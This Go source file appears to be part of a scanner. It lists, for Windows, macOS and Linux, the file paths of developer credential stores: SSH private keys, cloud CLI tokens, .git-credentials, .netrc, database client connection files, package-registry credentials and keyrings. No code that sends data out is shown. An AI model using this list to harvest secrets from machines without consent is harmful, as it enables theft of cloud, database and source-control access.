package scanner

// ================================================================
// 九、Shell 历史 / 环境变量 / 全局配置
// ================================================================
func toolsCatConfig() []Tool {
	return []Tool{
		{Name: "Shell_History",
			WinPaths:   []string{"${HOME}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine"},
			MacPaths:   []string{"~/.bash_history", "~/.zsh_history", "~/.zhistory", "~/.fish_history"},
			LinuxPaths: []string{"~/.bash_history", "~/.zsh_history", "~/.zhistory", "~/.fish_history"},
			MaxFileSize: mb(10)},
		{Name: "Env_Files",
			WinPaths:   []string{"${HOME}\\.env", "${HOME}\\.env.local", "${HOME}\\.envrc"},
			MacPaths:   []string{"~/.env", "~/.env.local", "~/.envrc"},
			LinuxPaths: []string{"~/.env", "~/.env.local", "~/.envrc"},
			MaxFileSize: mb(1)},
		{Name: "npmrc",
			WinPaths:   []string{"${HOME}\\.npmrc"},
			MacPaths:   []string{"~/.npmrc"},
			LinuxPaths: []string{"~/.npmrc"},
			MaxFileSize: mb(1)},
		{Name: "pip_conf",
			WinPaths:   []string{"${APPDATA}\\pip\\pip.ini", "${HOME}\\pip\\pip.ini"},
			MacPaths:   []string{"~/.pip/pip.conf", "~/.config/pip/pip.conf"},
			LinuxPaths: []string{"~/.pip/pip.conf", "~/.config/pip/pip.conf"},
			MaxFileSize: mb(1)},
		{Name: "gitconfig",
			WinPaths:   []string{"${HOME}\\.gitconfig", "${HOME}\\.git-credentials"},
			MacPaths:   []string{"~/.gitconfig", "~/.git-credentials"},
			LinuxPaths: []string{"~/.gitconfig", "~/.git-credentials"},
			MaxFileSize: mb(1)},
		{Name: "SSH_Config",
			WinPaths:   []string{"${HOME}\\.ssh\\config", "${HOME}\\.ssh\\id_*"},
			MacPaths:   []string{"~/.ssh/config", "~/.ssh/id_*"},
			LinuxPaths: []string{"~/.ssh/config", "~/.ssh/id_*"},
			MaxFileSize: mb(1)},
		{Name: "AWS_CLI",
			WinPaths:   []string{"${HOME}\\.aws\\credentials", "${HOME}\\.aws\\config"},
			MacPaths:   []string{"~/.aws/credentials", "~/.aws/config"},
			LinuxPaths: []string{"~/.aws/credentials", "~/.aws/config"},
			MaxFileSize: mb(1)},
		{Name: "GCloud_CLI",
			WinPaths:   []string{"${APPDATA}\\gcloud\\credentials.db", "${APPDATA}\\gcloud\\configurations"},
			MacPaths:   []string{"~/.config/gcloud/credentials.db", "~/.config/gcloud/configurations"},
			LinuxPaths: []string{"~/.config/gcloud/credentials.db", "~/.config/gcloud/configurations"},
			Extensions: []string{".db", ".json"}, MaxFileSize: mb(10)},
		{Name: "Azure_CLI",
			WinPaths:   []string{"${HOME}\\.azure\\*Profile.json", "${HOME}\\.azure\\msal_token_cache.json"},
			MacPaths:   []string{"~/.azure/*Profile.json", "~/.azure/msal_token_cache.json"},
			LinuxPaths: []string{"~/.azure/*Profile.json", "~/.azure/msal_token_cache.json"},
			Extensions: []string{".json"}, MaxFileSize: mb(10)},
		{Name: "Docker_Config",
			WinPaths:   []string{"${HOME}\\.docker\\config.json"},
			MacPaths:   []string{"~/.docker/config.json"},
			LinuxPaths: []string{"~/.docker/config.json"},
			Extensions: []string{".json"}, MaxFileSize: mb(1)},
		{Name: "Kubernetes_Config",
			WinPaths:   []string{"${HOME}\\.kube\\config"},
			MacPaths:   []string{"~/.kube/config"},
			LinuxPaths: []string{"~/.kube/config"},
			MaxFileSize: mb(5)},
		{Name: "Terraform",
			WinPaths:   []string{"${HOME}\\.terraformrc", "${HOME}\\.terraform.d"},
			MacPaths:   []string{"~/.terraformrc", "~/.terraform.d"},
			LinuxPaths: []string{"~/.terraformrc", "~/.terraform.d"},
			Extensions: []string{".tfvars", ".tf", ".json"}, MaxFileSize: mb(5)},
		{Name: "Pulumi",
			WinPaths:   []string{"${HOME}\\.pulumi", "${HOME}\\.pulumirc"},
			MacPaths:   []string{"~/.pulumi", "~/.pulumirc"},
			LinuxPaths: []string{"~/.pulumi", "~/.pulumirc"},
			Extensions: []string{".yaml", ".yml", ".json"}, MaxFileSize: mb(5)},

		// ================================================================
		// 十、数据库客户端工具
		// ================================================================
		{Name: "DBeaver",
			WinPaths:   []string{"${APPDATA}\\DBeaverData", "${HOME}\\.dbeaver"},
			MacPaths:   []string{"~/Library/DBeaverData", "~/.dbeaver"},
			LinuxPaths: []string{"~/.dbeaver", "${CONFIG}/DBeaverData"},
			Extensions: []string{".json", ".xml", ".sql", ".properties"}, MaxFileSize: mb(10)},
		{Name: "TablePlus",
			WinPaths:   []string{"${APPDATA}\\TablePlus", "${LOCALAPPDATA}\\TablePlus"},
			MacPaths:   []string{"~/Library/Application Support/TablePlus", "~/Library/Preferences/com.tableplus.TablePlus.plist"},
			LinuxPaths: []string{"${CONFIG}/TablePlus"},
			Extensions: []string{".json", ".plist", ".connection"}, MaxFileSize: mb(5)},
		{Name: "DataGrip",
			WinPaths:   []string{"${APPDATA}\\JetBrains\\DataGrip*"},
			MacPaths:   []string{"~/Library/Application Support/JetBrains/DataGrip*"},
			LinuxPaths: []string{"${CONFIG}/JetBrains/DataGrip*", "~/.local/share/JetBrains/DataGrip*"},
			Extensions: []string{".xml", ".json", ".sql"}, MaxFileSize: mb(10)},
		{Name: "pgAdmin",
			WinPaths:   []string{"${APPDATA}\\pgAdmin", "${HOME}\\.pgadmin"},
			MacPaths:   []string{"~/Library/Application Support/pgAdmin", "~/.pgadmin"},
			LinuxPaths: []string{"~/.pgadmin", "${CONFIG}/pgadmin"},
			Extensions: []string{".json", ".db", ".sqlite"}, MaxFileSize: mb(10)},
		{Name: "MongoDB_Compass",
			WinPaths:   []string{"${APPDATA}\\MongoDB Compass", "${LOCALAPPDATA}\\MongoDB Compass"},
			MacPaths:   []string{"~/Library/Application Support/MongoDB Compass", "~/Library/Preferences/mongodb-compass.plist"},
			LinuxPaths: []string{"${CONFIG}/MongoDB Compass", "~/.config/MongoDB Compass"},
			Extensions: []string{".json", ".log"}, MaxFileSize: mb(5)},
		{Name: "MySQL_Workbench",
			WinPaths:   []string{"${APPDATA}\\MySQL\\Workbench"},
			MacPaths:   []string{"~/Library/Application Support/MySQL/Workbench", "~/Library/Preferences/com.oracle.workbench.MySQLWorkbench.plist"},
			LinuxPaths: []string{"~/.mysql/workbench", "${CONFIG}/mysql/workbench"},
			Extensions: []string{".xml", ".ini", ".cnf"}, MaxFileSize: mb(5)},
		{Name: "Redis_Desktop_Manager",
			WinPaths:   []string{"${APPDATA}\\Redis Desktop Manager", "${APPDATA}\\rdm"},
			MacPaths:   []string{"~/Library/Application Support/Redis Desktop Manager", "~/Library/Application Support/rdm"},
			LinuxPaths: []string{"${CONFIG}/Redis Desktop Manager", "${CONFIG}/rdm", "~/.rdm"},
			Extensions: []string{".json", ".conf"}, MaxFileSize: mb(5)},
		{Name: "HeidiSQL",
			WinPaths:   []string{"${APPDATA}\\HeidiSQL"},
			MacPaths:   []string{},
			LinuxPaths: []string{"~/.heidisql"},
			Extensions: []string{".ini", ".cfg", ".sql"}, MaxFileSize: mb(5)},
		{Name: "Navicat",
			WinPaths:   []string{"${APPDATA}\\Navicat", "${APPDATA}\\PremiumSoft\\Navicat"},
			MacPaths:   []string{"~/Library/Application Support/Navicat", "~/Library/Preferences/com.navicat.*.plist"},
			LinuxPaths: []string{"~/.navicat", "${CONFIG}/navicat"},
			Extensions: []string{".json", ".xml", ".ncx"}, MaxFileSize: mb(10)},

		// ================================================================
		// 十一、云平台 / 基础设施 CLI
		// ================================================================
		{Name: "Vercel_CLI",
			WinPaths:   []string{"${HOME}\\.vercel"},
			MacPaths:   []string{"~/.vercel"},
			LinuxPaths: []string{"~/.vercel"},
			Extensions: []string{".json"}, MaxFileSize: mb(2)},
		{Name: "Netlify_CLI",
			WinPaths:   []string{"${HOME}\\.netlify"},
			MacPaths:   []string{"~/.netlify"},
			LinuxPaths: []string{"~/.netlify"},
			Extensions: []string{".json", ".toml"}, MaxFileSize: mb(2)},
		{Name: "Firebase_CLI",
			WinPaths:   []string{"${HOME}\\.firebase"},
			MacPaths:   []string{"~/.firebase"},
			LinuxPaths: []string{"~/.firebase"},
			Extensions: []string{".json"}, MaxFileSize: mb(2)},
		{Name: "Supabase_CLI",
			WinPaths:   []string{"${HOME}\\.supabase"},
			MacPaths:   []string{"~/.supabase"},
			LinuxPaths: []string{"~/.supabase"},
			Extensions: []string{".json", ".toml", ".env"}, MaxFileSize: mb(2)},
		{Name: "Cloudflare_Wrangler",
			WinPaths:   []string{"${HOME}\\.wrangler", "${CONFIG}\\wrangler"},
			MacPaths:   []string{"~/.wrangler", "~/.config/wrangler"},
			LinuxPaths: []string{"~/.wrangler", "${CONFIG}/wrangler"},
			Extensions: []string{".json", ".toml"}, MaxFileSize: mb(2)},
		{Name: "DigitalOcean_CLI",
			WinPaths:   []string{"${HOME}\\.config\\doctl", "${HOME}\\.digitalocean"},
			MacPaths:   []string{"~/.config/doctl", "~/.digitalocean"},
			LinuxPaths: []string{"~/.config/doctl", "~/.digitalocean"},
			Extensions: []string{".json", ".yaml"}, MaxFileSize: mb(2)},
		{Name: "Linode_CLI",
			WinPaths:   []string{"${HOME}\\.config\\linode-cli"},
			MacPaths:   []string{"~/.config/linode-cli"},
			LinuxPaths: []string{"~/.config/linode-cli"},
			Extensions: []string{".json", ".conf"}, MaxFileSize: mb(2)},
		{Name: "Heroku_CLI",
			WinPaths:   []string{"${HOME}\\_netrc", "${HOME}\\.heroku"},
			MacPaths:   []string{"~/.netrc", "~/.heroku"},
			LinuxPaths: []string{"~/.netrc", "~/.heroku"},
			MaxFileSize: mb(2)},

		// ================================================================
		// 十二、自动化 / 编排工具
		// ================================================================
		{Name: "n8n",
			WinPaths:   []string{"${HOME}\\.n8n"},
			MacPaths:   []string{"~/.n8n"},
			LinuxPaths: []string{"~/.n8n"},
			Extensions: []string{".json", ".sqlite", ".env"}, MaxFileSize: mb(10)},
		{Name: "Node_RED",
			WinPaths:   []string{"${HOME}\\.node-red"},
			MacPaths:   []string{"~/.node-red"},
			LinuxPaths: []string{"~/.node-red"},
			Extensions: []string{".json", ".js", ".flows"}, MaxFileSize: mb(10)},
		{Name: "Ansible",
			WinPaths:   []string{"${HOME}\\.ansible"},
			MacPaths:   []string{"~/.ansible"},
			LinuxPaths: []string{"~/.ansible"},
			Extensions: []string{".yml", ".yaml", ".cfg", ".ini", ".vault"}, MaxFileSize: mb(5)},
		{Name: "Vagrant",
			WinPaths:   []string{"${HOME}\\.vagrant.d"},
			MacPaths:   []string{"~/.vagrant.d"},
			LinuxPaths: []string{"~/.vagrant.d"},
			Extensions: []string{".json", ".rb"}, MaxFileSize: mb(5)},
		{Name: "Helm",
			WinPaths:   []string{"${HOME}\\.helm", "${APPDATA}\\helm"},
			MacPaths:   []string{"~/.helm", "~/Library/Preferences/helm"},
			LinuxPaths: []string{"~/.helm", "${CONFIG}/helm"},
			Extensions: []string{".yaml", ".yml", ".json"}, MaxFileSize: mb(5)},

		// ================================================================
		// 十三、IDE / 编辑器
		// ================================================================
		{Name: "Sublime_Text",
			WinPaths:   []string{"${APPDATA}\\Sublime Text\\Packages", "${APPDATA}\\Sublime Text 3\\Packages"},
			MacPaths:   []string{"~/Library/Application Support/Sublime Text/Packages", "~/Library/Application Support/Sublime Text 3/Packages"},
			LinuxPaths: []string{"${CONFIG}/sublime-text/Packages", "~/.config/sublime-text-3/Packages"},
			Extensions: []string{".sublime-settings", ".json"}, MaxFileSize: mb(5)},
		{Name: "Android_Studio",
			WinPaths:   []string{"${APPDATA}\\Google\\AndroidStudio*", "${HOME}\\.AndroidStudio*"},
			MacPaths:   []string{"~/Library/Application Support/Google/AndroidStudio*", "~/Library/Preferences/AndroidStudio*"},
			LinuxPaths: []string{"${CONFIG}/Google/AndroidStudio*", "~/.AndroidStudio*"},
			Extensions: []string{".xml", ".json", ".properties"}, MaxFileSize: mb(10)},
		{Name: "Vim_Neovim",
			WinPaths:   []string{"${HOME}\\_vimrc", "${HOME}\\_gvimrc", "${LOCALAPPDATA}\\nvim"},
			MacPaths:   []string{"~/.vimrc", "~/.gvimrc", "~/.config/nvim", "~/.vim"},
			LinuxPaths: []string{"~/.vimrc", "~/.gvimrc", "~/.config/nvim", "~/.vim"},
			Extensions: []string{".vim", ".lua", ".json"}, MaxFileSize: mb(2)},

		// ================================================================
		// 十四、包管理器凭证 / 注册表
		// ================================================================
		{Name: "Cargo_Registry",
			WinPaths:   []string{"${HOME}\\.cargo\\credentials.toml", "${HOME}\\.cargo\\credentials"},
			MacPaths:   []string{"~/.cargo/credentials.toml", "~/.cargo/credentials"},
			LinuxPaths: []string{"~/.cargo/credentials.toml", "~/.cargo/credentials"},
			MaxFileSize: mb(1)},
		{Name: "Composer_Auth",
			WinPaths:   []string{"${APPDATA}\\Composer\\auth.json"},
			MacPaths:   []string{"~/.composer/auth.json", "~/.config/composer/auth.json"},
			LinuxPaths: []string{"~/.composer/auth.json", "~/.config/composer/auth.json"},
			Extensions: []string{".json"}, MaxFileSize: mb(1)},
		{Name: "Maven_Settings",
			WinPaths:   []string{"${HOME}\\.m2\\settings.xml"},
			MacPaths:   []string{"~/.m2/settings.xml"},
			LinuxPaths: []string{"~/.m2/settings.xml"},
			Extensions: []string{".xml"}, MaxFileSize: mb(1)},
		{Name: "NuGet_Config",
			WinPaths:   []string{"${APPDATA}\\NuGet\\NuGet.Config", "${HOME}\\.nuget\\NuGet\\NuGet.Config"},
			MacPaths:   []string{"~/.nuget/NuGet/NuGet.Config"},
			LinuxPaths: []string{"~/.nuget/NuGet/NuGet.Config"},
			Extensions: []string{".Config", ".config", ".xml"}, MaxFileSize: mb(1)},
		{Name: "PyPI_Python_Keyring",
			WinPaths:   []string{"${APPDATA}\\Python\\keyring", "${LOCALAPPDATA}\\Python\\keyring"},
			MacPaths:   []string{"~/Library/Python/keyring"},
			LinuxPaths: []string{"~/.local/share/python_keyring", "~/.local/share/keyrings"},
			Extensions: []string{".keyring", ".ini"}, MaxFileSize: mb(2)},
		{Name: "Gem_Credentials",
			WinPaths:   []string{"${HOME}\\.gem\\credentials"},
			MacPaths:   []string{"~/.gem/credentials"},
			LinuxPaths: []string{"~/.gem/credentials"},
			MaxFileSize: mb(1)},
	}
}